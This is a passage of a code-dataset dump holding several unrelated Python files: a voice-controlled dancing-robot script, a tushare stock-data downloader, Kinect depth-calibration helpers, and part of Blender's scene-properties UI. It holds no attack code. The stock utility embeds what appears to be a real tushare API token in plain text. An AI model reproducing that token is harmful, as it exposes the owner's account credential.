left_leg_compare = 1\n        elif \"戻\" in text:\n            print(\"mode: both legs forward\")\n            right_leg_compare = 0\n            left_leg_compare = 0\n\n    elif \"右足\" in text and \"左足\" not in text:\n        if \"出さない\" in text:\n            print(\"mode: right leg back\")\n            right_leg_compare = 1\n        elif \"戻さない\" in text:\n            print(\"mode: right leg back\")\n            right_leg_compare = 1\n        elif \"前\" in text:\n            print(\"mode: right leg forward\")\n            right_leg_compare = 0\n        elif \"後\" in text:\n            print(\"mode: right leg back\")\n            right_leg_compare = 1\n        elif \"戻\" in text:\n            print(\"mode: right leg forward\")\n            right_leg_compare = 0\n\n    elif \"左足\" in text and \"右足\" not in text:\n        if \"出さない\" in text:\n            print(\"mode: left leg back\")\n            left_leg_compare = 1\n        elif \"戻さない\" in text:\n            print(\"mode: left leg back\")\n            left_leg_compare = 1\n        elif \"前\" in text:\n            print(\"mode: left leg forward\")\n            left_leg_compare = 0\n        elif \"後\" in text:\n            print(\"mode: left leg back\")\n            left_leg_compare = 1\n        elif \"戻\" in text:\n            print(\"mode: left leg forward\")\n            left_leg_compare = 0\n    elif right_leg_compare == -1 and \"右足\" in text:\n        if \"右足を前に出さない\" in text:\n            print(\"mode: right leg back\")\n            right_leg_compare = 1\n        elif \"右足を後ろに戻さない\" in text:\n            print(\"mode: right leg back\")\n            right_leg_compare = 1\n        elif \"右足を前\" in text:\n            print(\"mode: right leg forward\")\n            right_leg_compare = 0\n        elif \"右足を後\" in text:\n            print(\"mode: right leg back\")\n            right_leg_compare = 1\n        elif \"右足を出さない\" in text:\n            print(\"mode: right leg back\")\n            right_leg_compare = 1\n        elif \"右足を戻さない\" in text:\n            print(\"mode: right leg back\")\n            right_leg_compare = 1\n        elif \"右足を出\" in text:\n            print(\"mode: right leg forward\")\n            right_leg_compare = 0\n        elif \"右足を戻\" in text:\n            print(\"mode: right leg forward\")\n            right_leg_compare = 0\n    elif left_leg_compare == -1 and \"左足\" in text:\n        if \"左足を前に出さない\" in text:\n            print(\"mode: left leg back\")\n            left_leg_compare = 1\n        elif \"左足を後ろに戻さない\" in text:\n            print(\"mode: left leg back\")\n            left_leg_compare = 1\n        elif \"左足を前\" in text:\n            print(\"mode: left leg forward\")\n            left_leg_compare = 0\n        elif \"左足を後\" in text:\n            print(\"mode: left leg back\")\n            left_leg_compare = 1\n        elif \"左足を出さない\" in text:\n            print(\"mode: left leg back\")\n            left_leg_compare = 1\n        elif \"左足を戻さない\" in text:\n            print(\"mode: left leg back\")\n            left_leg_compare = 1\n        elif \"左足を出\" in text:\n            print(\"mode: left leg forward\")\n            left_leg_compare = 0\n        elif \"左足を戻\" in text:\n            print(\"mode: left leg forward\")\n            left_leg_compare = 0\n\n    elif right_leg_compare == -1 and left_leg_compare == -1 and (\"足\" in text or \"脚\" in text):\n        if \"出さない\" in text:\n            print(\"mode: both legs back\")\n            right_leg_compare = 1\n            left_leg_compare = 1\n        elif \"戻さない\" in text:\n            print(\"mode: both legs back\")\n            right_leg_compare = 1\n            left_leg_compare = 1\n        elif \"戻\" in text:\n            print(\"mode: both legs forward\")\n            right_leg_compare = 0\n            left_leg_compare = 0\n        elif \"前\" in text:\n            print(\"mode: both legs forward\")\n            right_leg_compare = 0\n            left_leg_compare = 0\n        elif \"後\" in text:\n            print(\"mode: both legs back\")\n            right_leg_compare = 1\n            left_leg_compare = 1\n\n    elif right_leg_compare == -1 and left_leg_compare == -1:\n        if \"出さない\" in text:\n            print(\"mode: both legs back\")\n            right_leg_compare = 1\n            left_leg_compare = 1\n        elif \"前\" in text:\n            print(\"mode: both legs forward\")\n            right_leg_compare = 0\n            left_leg_compare = 0\n        elif \"後\" in text:\n            print(\"mode: both legs back\")\n            right_leg_compare = 1\n            left_leg_compare = 1\n\n    if \"最初\" in text:\n        right_arm_compare = 0\n        left_arm_compare = 0\n        right_leg_compare = 0\n        left_leg_compare = 0\n\n    if \"リセット\" in text:\n        return \"03,\"\n\n    if right_arm_compare == -1 and left_arm_compare == -1 and right_leg_compare == -1 and left_leg_compare == -1:\n        return \"-1\"\n\n    ret = \"02,\" + str(right_arm_compare) + \",\" + str(left_arm_compare) + \",\" + str(right_leg_compare) + \",\" + str(left_leg_compare)\n\n    return ret\n\n\ndef main(mode, command_input):\n    # while(1):\n    # print(\"init\")\n    if mode == 0:\n        text = voice2text()\n        command = text2coordinate(text)\n        if command == \"-1\":\n            return \"end\"\n    elif mode == 1:\n        command = text2coordinate(command_input)\n        if command == \"-1\":\n            return \"end\"\n    elif mode == 2:\n        command = \"02,\" + command_input\n    elif mode == 99:\n        command = command_input\n\n    python2arduino(command)\n    print(\"sent: {}\".format(command))\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) == 2:\n        if sys.argv[1] == \"99\":\n            # mode switch\n            mode = 99\n            command_input = \"99,\"\n        elif sys.argv[1] == \"03\":\n            # lower the arms\n            # rotate both arms at 75 degrees for 500 ms\n            mode = 99\n            command_input = \"03,\"\n        elif sys.argv[1] == \"05\":\n            # hello!\n            mode = 99\n            command_input = \"05,\"\n        elif sys.argv[1] == \"06\":\n            # yes!\n            mode = 99\n            command_input = \"06,\"\n        elif sys.argv[1] == \"07\":\n            # no way!\n            mode = 99\n            command_input = \"07,\"\n        elif sys.argv[1] == \"08\":\n            # bear!\n            mode = 99\n            command_input = \"08,\"\n        elif sys.argv[1] == \"10\":\n            # start dancing\n            mode = 99\n            command_input = \"10,\"\n        else:\n            # text input\n            mode = 1\n            command_input = sys.argv[1]\n\n    elif len(sys.argv) == 5:\n        if sys.argv[1] == \"04\":\n            # for adjusting a servo motor\n            # Input: 04, servo number, command, rotation time\n            # command: 0 lowers the arm, 1 raises it\n            # servo numbers:\n            # RIGHT_HAND_UPDOWN 0\n            # LEFT_HAND_UPDOWN 1\n            # RIGHT_LEG 2\n            # LEFT_LEG 3\n            # ALL_SERVO 4\n            mode = 99\n            command_input = \"04,\" + str(sys.argv[2]) + \",\" + str(sys.argv[3]) + \",\" + str(sys.argv[4])\n        else:\n            # direct command input\n            # 0 or 1 for right arm, left arm, right leg, left leg, in that order\n            mode = 2\n            command_input = str(sys.argv[1]) + \",\" + str(sys.argv[2]) + \",\" + str(sys.argv[3]) + \",\" + str(sys.argv[4])\n    else:\n        # no arguments -> speech recognition\n        mode = 0\n        command_input = None\n\n    main(mode, command_input)\n", "sub_path": "dance1_py/dance1_1.py", "file_name": "dance1_1.py", "file_ext": "py", "file_size_in_byte": 20304, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "serial.Serial", "line_number": 23, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 56, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 450, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 451, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 455, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 460, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 464, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 468, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 472, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 476, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 483, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 485, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 486, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 497, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 502, "usage_type": "attribute"}]}
+{"seq_id": "570336822", "text": "# _*_coding:utf-8_*_\nimport tushare as ts\nimport pandas as pd\nimport os\nimport time\n\npro = ts.pro_api('769b6990fd248e065e95887933ea517ae21e8dacdbd24bc0d1cf673a')\n\n\n# ---------------------- get the current time ------------------- #\ndef getCurrentTime():\n    return time.strftime('[%Y-%m-%d]', time.localtime(time.time()))\n\n\n# ---------------------- download data for a single stock ------------------- #\n# code: stock code; date format: 2020-03-11; filename: folder path such as ../data/\n# length filters stocks by history length. The default -1 means no filtering;\n# a value such as 300 means stocks with fewer than 300 days of data are not saved.\ndef get_stock_data(code, date1, date2, filename, length=-1):\n    df = ts.get_hist_data(code, start=date1, end=date2)\n    df1 = pd.DataFrame(df)\n    df1 = df1[['open', 'high', 'close', 'low', 'volume', 'p_change']]\n    df1 = df1.sort_values(by='date')\n    print('%s days of data in total' % len(df1))\n    if not os.path.exists(filename):\n        os.makedirs(filename)\n    if length == -1:\n        path = code + '.csv'\n        df1.to_csv(os.path.join(filename, path))\n    else:\n        if len(df1) >= length:\n            path = code + '.csv'\n            df1.to_csv(os.path.join(filename, path))\n\n\n# ---------------------- download CSI 300 index data ------------------- #\n# date1 is the start date, date2 the end date, filename the output directory\ndef get_hs300_data(date1, date2, filename):\n    df = ts.get_hist_data('399300', start=date1, end=date2)\n    df1 = pd.DataFrame(df)\n    df1 = df1[['open', 'high', 'close', 'low', 'volume', 'p_change']]\n    df1 = df1.sort_values(by='date')\n    print('%s days of data in total' % len(df1))\n    df1.to_csv(os.path.join(filename, '399300.csv'))\n\n\n# ------------------------ update stock data ------------------------ #\n# bring the local file up to date, from its last recorded date to today\n# code: stock code\ndef update_stock_data(code):\n    filename = '../data/stock_basic/' + code + '.csv'\n    (filepath, tempfilename) = os.path.split(filename)\n    (stock_code, extension) = os.path.splitext(tempfilename)\n    f = open(filename, 'r')\n    df = pd.read_csv(f)\n    print('latest date in the file for stock {}: {}'.format(stock_code, df.iloc[-1, 0]))\n    data_now = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n    print('updating up to: %s' % data_now)\n    nf = ts.get_hist_data(stock_code, str(df.iloc[-1, 0]), data_now)\n    nf = nf.sort_values(by='date')\n    nf = nf.iloc[1:]\n    print('%s days of data in total' % len(nf))\n    nf = pd.DataFrame(nf)\n    nf = nf[['open', 'high', 'close', 'low', 'volume', 'p_change']]\n    nf.to_csv(filename, mode='a', header=False)\n    f.close()\n\n\n# ---------------------- download the CSI 300 constituent list ------------------- #\ndef get_hs300_code_name(filename):\n    df = ts.get_hs300s()\n    df1 = pd.DataFrame(df)\n    df1 = df1[['name', 'code']]\n    df1.to_csv(os.path.join(filename, 'hs300.csv'))\n\n\n# ------------------------ batch-download CSI 300 stock data ------------------------ #\ndef download_hs300_stock_data(date1, date2, filename):\n    df = pd.read_csv('../data/hs300/hs300.csv')['code']\n    for code in df:\n        code = \"{0:06d}\".format(code)\n        if not os.path.exists('../data/hs300/{}.csv'.format(code)):\n            get_stock_data(code, date1, date2, filename)\n\n\n# ------------------------ deduplicate rows with pandas ------------------------ #\ndef quchong(file):\n    f = open(file)\n    df = pd.read_csv(f, header=0)\n    datalist = df.drop_duplicates()\n    datalist.to_csv(file)\n\n\n# ------------------------ get the length of a stock's history ----------------------- #\n# helper function\ndef get_data_len(file_path):\n    df = pd.read_csv(file_path)\n    return len(df)\n\n\n# ------------------------ get the exchange trading calendar ----------------------- #\ndef trade_cal_sse(start_date):\n    # exchange: SSE (Shanghai) or SZSE (Shenzhen)\n    df = pro.trade_cal(exchange='SZSE', start_date='20180101', end_date='20200405')\n    df.to_csv('../data/trade_cal/trade_cal_szse.csv')\n\n\n# ------------------------ get the list of all currently listed stocks ----------------------- #\ndef get_stock_basic():\n    # query all stocks that are currently listed and trading\n    df = pro.stock_basic(exchange='', list_status='L', fields='ts_code,symbol,name,area,industry,fullname,market,'\n                                                              'list_date')\n    # drop ST (special treatment) stocks\n    df = df[~df.name.str.contains('ST')]\n    df.to_csv('../data/stock_basic/stock_basic.csv')\n\n\n# ----------------------------- batch-download data for all stocks -----------------------------------#\ndef download_all_stock():\n    pool = pd.read_csv('../data/stock_basic/stock_basic.csv')\n    print('number of listed stocks:', len(pool) - 1)\n    j = 1\n    for code in pool.ts_code[3074:]:\n        print('fetching stock %d, code %s.' % (j, code))\n        j += 1\n        path = '../data/stock_basic/' + code + '.csv'\n        # if not os.path.exists('../data/stock_basic/'+code+'.csv'):\n        df = pro.daily(ts_code=code, start_date='20180101')\n        df = df.sort_values(by='trade_date', ascending=True)\n        df.to_csv(path, index=0)\n", "sub_path": "util/data_utils.py", "file_name": "data_utils.py", "file_ext": "py", "file_size_in_byte": 5069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tushare.pro_api", "line_number": 7, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 12, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 12, "usage_type": "call"}, {"api_name": "time.time", "line_number": 12, "usage_type": "call"}, {"api_name": "tushare.get_hist_data", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tushare.get_hist_data", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 56, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 56, "usage_type": "call"}, {"api_name": "tushare.get_hist_data", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 62, "usage_type": "call"}, {"api_name": "tushare.get_hs300s", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "274239883", "text": "import numpy as np\nimport config\n\n# reciprocal-depth lookup table for 16-bit OpenNI depth values (mm -> 1000/mm)\nlut = np.arange(5000).astype('f')\nlut[1:] = 1000./lut[1:]\nlut[0] = -1e8\n\n\ndef recip_depth_openni(depth):\n    import scipy.weave\n    assert depth.dtype == np.uint16\n    output = np.empty(depth.shape,'f')\n    N = np.prod(depth.shape)\n    code = \"\"\"\n    int i;\n    for (i = 0; i < (int)N; i++) {\n        output[i] = lut[depth[i]];\n    }\n    \"\"\"\n    scipy.weave.inline(code, ['output','depth','lut','N'])\n    return output\n\n\ndef projection():\n    if config.ALIGNED:\n        return aligned_projection()\n    else:\n        return unaligned_projection()\n\n\ndef aligned_projection():\n    \"\"\"\n    Camera matrix for the aligned (RGB-registered) depth image\n    \"\"\"\n    fx = 528.0\n    fy = 528.0\n    cx = 320.0\n    cy = 267.0\n\n    mat = np.array([[fx, 0, -cx, 0],\n                    [0, -fy, -cy, 0],\n                    [0, 0, 0, 1],\n                    [0, 0, -1., 0]]).astype('f')\n    return np.ascontiguousarray(mat)\n\n\ndef unaligned_projection():\n    \"\"\"\n    Camera matrix for the unaligned depth image\n    \"\"\"\n    fx = 575.8\n    fy = 575.8\n    cx = 320.0\n    cy = 240.0\n\n    mat = np.array([[fx, 0, -cx, 0],\n                    [0, -fy, -cy, 0],\n                    [0, 0, 0, 1],\n                    [0, 0, -1., 0]]).astype('f')\n    return np.ascontiguousarray(mat)\n\n\nfull_vu = np.mgrid[:480,:640].astype('f')\n\n\ndef convertOpenNI2Real_weave(depth, u=None, v=None,\n                             mat=np.ascontiguousarray(\n                                 np.linalg.inv(projection()))):\n    assert mat.dtype == np.float32\n    assert mat.shape == (4,4)\n    assert mat.flags['C_CONTIGUOUS']\n    assert depth.dtype == np.uint16\n\n    if u is None or v is None: v,u = full_vu\n    assert depth.shape == u.shape == v.shape\n\n    X,Y = u,v\n    x,y,z = [np.empty(depth.shape, 'f') for i in range(3)]\n\n    N = np.prod(depth.shape)\n    code = \"\"\"\n    int i;\n    for (i = 0; i < (int)N; i++) {\n        float Z = lut[depth[i]];\n        float x_ = X[i]*mat[0] + Y[i]*mat[1] + Z*mat[2] + mat[3];\n        float y_ = X[i]*mat[4] + Y[i]*mat[5] + Z*mat[6] + mat[7];\n        float z_ = X[i]*mat[8] + Y[i]*mat[9] + Z*mat[10] + mat[11];\n        float w = X[i]*mat[12] + Y[i]*mat[13] + Z*mat[14] + mat[15];\n        w = 1/w;\n        x[i] = x_*w;\n        y[i] = y_*w;\n        z[i] = z_*w;\n    }\n    \"\"\"\n    import scipy.weave\n    scipy.weave.inline(code, ['X','Y','depth','x','y','z','N','mat','lut'])\n    return x,y,z\n\n\ndef convertOpenNI2Real_numpy(depth, u=None, v=None,\n                             mat=np.linalg.inv(projection())):\n\n    if u is None or v is None: v,u = full_vu\n\n    X,Y,Z = u,v, recip_depth_openni(depth)\n    x,y,z = [np.empty(depth.shape, 'f') for i in range(3)]\n\n    x = X*mat[0,0] + Y*mat[0,1] + Z*mat[0,2] + mat[0,3]\n    y = X*mat[1,0] + Y*mat[1,1] + Z*mat[1,2] + mat[1,3]\n    z = X*mat[2,0] + Y*mat[2,1] + Z*mat[2,2] + mat[2,3]\n    w = X*mat[3,0] + Y*mat[3,1] + Z*mat[3,2] + mat[3,3]\n    w = 1/w\n    return x*w, y*w, z*w\n\n\ndef convertReal2OpenNI(X, Y, Z, mat=projection()):\n\n    x = X*mat[0,0] + Y*mat[0,1] + Z*mat[0,2] + mat[0,3]\n    y = X*mat[1,0] + Y*mat[1,1] + Z*mat[1,2] + mat[1,3]\n    z = X*mat[2,0] + Y*mat[2,1] + Z*mat[2,2] + mat[2,3]\n    w = X*mat[3,0] + Y*mat[3,1] + Z*mat[3,2] + mat[3,3]\n    _z = 1000.*w/z\n    w = 1/w\n    return x*w, y*w, _z\n\n\nfrom calibkinect_cy import convertOpenNI2Real\n", "sub_path": "blockplayer/calibkinect.py", "file_name": "calibkinect.py", "file_ext": "py", "file_size_in_byte": 3284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.arange", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 13, "usage_type": "call"}, {"api_name": 
"scipy.weave.weave.inline", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.weave.weave", "line_number": 20, "usage_type": "attribute"}, {"api_name": "scipy.weave", "line_number": 20, "usage_type": "name"}, {"api_name": "config.ALIGNED", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.mgrid", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.ascontiguousarray", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 81, "usage_type": "call"}, {"api_name": "scipy.weave.weave.inline", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.weave.weave", "line_number": 97, "usage_type": "attribute"}, {"api_name": "scipy.weave", "line_number": 97, "usage_type": "name"}, {"api_name": "numpy.linalg.inv", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 107, "usage_type": "call"}]}
+{"seq_id": "466102011", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport bpy\nfrom bpy.types import (\n Panel,\n UIList,\n)\n\nfrom rna_prop_ui import PropertyPanel\nfrom bl_operators.presets import PresetMenu\n\nfrom .properties_physics_common import (\n point_cache_ui,\n effector_weights_ui,\n)\n\n\nclass SCENE_UL_keying_set_paths(UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n # assert(isinstance(item, bpy.types.KeyingSetPath)\n kspath = item\n icon = layout.enum_item_icon(kspath, \"id_type\", kspath.id_type)\n if self.layout_type in {'DEFAULT', 'COMPACT'}:\n # Do not make this one editable in uiList for now...\n layout.label(text=kspath.data_path, translate=False, icon_value=icon)\n elif self.layout_type == 'GRID':\n layout.alignment = 'CENTER'\n layout.label(text=\"\", icon_value=icon)\n\n\nclass SceneButtonsPanel:\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"scene\"\n\n @classmethod\n def poll(cls, context):\n return (context.engine in cls.COMPAT_ENGINES)\n\n\nclass SCENE_PT_scene(SceneButtonsPanel, Panel):\n bl_label = \"Scene\"\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False\n\n scene = context.scene\n\n layout.prop(scene, \"camera\")\n layout.prop(scene, \"background_set\")\n layout.prop(scene, \"active_clip\")\n\n\nclass SCENE_PT_unit(SceneButtonsPanel, Panel):\n bl_label = \"Units\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw(self, context):\n layout = self.layout\n\n unit = context.scene.unit_settings\n\n layout.use_property_split = True\n layout.use_property_decorate = False\n\n layout.prop(unit, \"system\")\n\n col = layout.column()\n col.enabled = unit.system != 'NONE'\n col.prop(unit, \"scale_length\")\n col.prop(unit, \"use_separate\")\n\n col = layout.column()\n col.prop(unit, \"system_rotation\", text=\"Rotation\")\n subcol = col.column()\n subcol.enabled = unit.system != 'NONE'\n subcol.prop(unit, \"length_unit\", text=\"Length\")\n subcol.prop(unit, \"mass_unit\", text=\"Mass\")\n subcol.prop(unit, \"time_unit\", text=\"Time\")\n\n\nclass SceneKeyingSetsPanel:\n\n @staticmethod\n def draw_keyframing_settings(context, layout, ks, ksp):\n SceneKeyingSetsPanel._draw_keyframing_setting(\n context, layout, ks, ksp, \"Needed\",\n \"use_insertkey_override_needed\", \"use_insertkey_needed\",\n userpref_fallback=\"use_keyframe_insert_needed\",\n )\n SceneKeyingSetsPanel._draw_keyframing_setting(\n context, layout, ks, ksp, \"Visual\",\n \"use_insertkey_override_visual\", \"use_insertkey_visual\",\n 
userpref_fallback=\"use_visual_keying\",\n )\n SceneKeyingSetsPanel._draw_keyframing_setting(\n context, layout, ks, ksp, \"XYZ to RGB\",\n \"use_insertkey_override_xyz_to_rgb\", \"use_insertkey_xyz_to_rgb\",\n )\n\n @staticmethod\n def _draw_keyframing_setting(context, layout, ks, ksp, label, toggle_prop, prop, userpref_fallback=None):\n if ksp:\n item = ksp\n\n if getattr(ks, toggle_prop):\n owner = ks\n propname = prop\n else:\n owner = context.preferences.edit\n if userpref_fallback:\n propname = userpref_fallback\n else:\n propname = prop\n else:\n item = ks\n\n owner = context.preferences.edit\n if userpref_fallback:\n propname = userpref_fallback\n else:\n propname = prop\n\n row = layout.row(align=True)\n\n subrow = row.row(align=True)\n subrow.active = getattr(item, toggle_prop)\n\n if subrow.active:\n subrow.prop(item, prop, text=label)\n else:\n subrow.prop(owner, propname, text=label)\n\n row.prop(item, toggle_prop, text=\"\", icon='STYLUS_PRESSURE', toggle=True) # XXX: needs dedicated icon\n\n\nclass SCENE_PT_keying_sets(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):\n bl_label = \"Keying Sets\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw(self, context):\n layout = self.layout\n\n scene = context.scene\n\n row = layout.row()\n\n col = row.column()\n col.template_list(\"UI_UL_list\", \"keying_sets\", scene, \"keying_sets\", scene.keying_sets, \"active_index\", rows=1)\n\n col = row.column(align=True)\n col.operator(\"anim.keying_set_add\", icon='ADD', text=\"\")\n col.operator(\"anim.keying_set_remove\", icon='REMOVE', text=\"\")\n\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n flow = layout.grid_flow(row_major=False, columns=0, even_columns=False, even_rows=False, align=False)\n\n ks = scene.keying_sets.active\n if ks and ks.is_path_absolute:\n col = flow.column()\n col.prop(ks, \"bl_description\")\n\n subcol = flow.column()\n subcol.operator_context = 'INVOKE_DEFAULT'\n subcol.operator(\"anim.keying_set_export\", text=\"Export to File\").filepath = \"keyingset.py\"\n\n\nclass SCENE_PT_keyframing_settings(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):\n bl_label = \"Keyframing Settings\"\n bl_parent_id = \"SCENE_PT_keying_sets\"\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}\n\n @classmethod\n def poll(cls, context):\n ks = context.scene.keying_sets.active\n return (ks and ks.is_path_absolute)\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n scene = context.scene\n ks = scene.keying_sets.active\n\n flow = layout.grid_flow(row_major=True, columns=0, even_columns=False, even_rows=False, align=True)\n\n col = flow.column(align=True)\n col.alignment = 'RIGHT'\n col.label(text=\"General Override\")\n\n self.draw_keyframing_settings(context, col, ks, None)\n\n ksp = ks.paths.active\n if ksp:\n col.separator()\n\n col = flow.column(align=True)\n col.alignment = 'RIGHT'\n col.label(text=\"Active Set Override\")\n\n self.draw_keyframing_settings(context, col, ks, ksp)\n\n\nclass SCENE_PT_keying_set_paths(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):\n bl_label = \"Active Keying Set\"\n bl_parent_id = \"SCENE_PT_keying_sets\"\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n @classmethod\n def poll(cls, context):\n ks = context.scene.keying_sets.active\n return (ks and ks.is_path_absolute)\n\n def draw(self, context):\n 
layout = self.layout\n\n scene = context.scene\n ks = scene.keying_sets.active\n\n row = layout.row()\n row.label(text=\"Paths:\")\n\n row = layout.row()\n\n col = row.column()\n col.template_list(\"SCENE_UL_keying_set_paths\", \"\", ks, \"paths\", ks.paths, \"active_index\", rows=1)\n\n col = row.column(align=True)\n col.operator(\"anim.keying_set_path_add\", icon='ADD', text=\"\")\n col.operator(\"anim.keying_set_path_remove\", icon='REMOVE', text=\"\")\n\n # TODO: 1) the template_any_ID needs to be fixed for the text alignment.\n # 2) use_property_decorate has to properly skip the non animatable properties.\n # Properties affected with needless draw:\n # group_method, template_any_ID dropdown, use_entire_array\n\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation (remove this later on).\n\n flow = layout.grid_flow(row_major=False, columns=0, even_columns=False, even_rows=False, align=True)\n\n ksp = ks.paths.active\n if ksp:\n col = flow.column(align=True)\n col.alignment = 'RIGHT'\n\n col.template_any_ID(ksp, \"id\", \"id_type\", text=\"Target ID-Block\")\n\n col.separator()\n\n col.template_path_builder(ksp, \"data_path\", ksp.id, text=\"Data Path\")\n\n col = flow.column()\n\n col.prop(ksp, \"use_entire_array\", text=\"Array All Items\")\n\n if not ksp.use_entire_array:\n col.prop(ksp, \"array_index\", text=\"Index\")\n\n col.separator()\n\n col.prop(ksp, \"group_method\", text=\"F-Curve Grouping\")\n if ksp.group_method == 'NAMED':\n col.prop(ksp, \"group\")\n\n\nclass SCENE_PT_audio(SceneButtonsPanel, Panel):\n bl_label = \"Audio\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE', 'BLENDER_WORKBENCH'}\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n\n scene 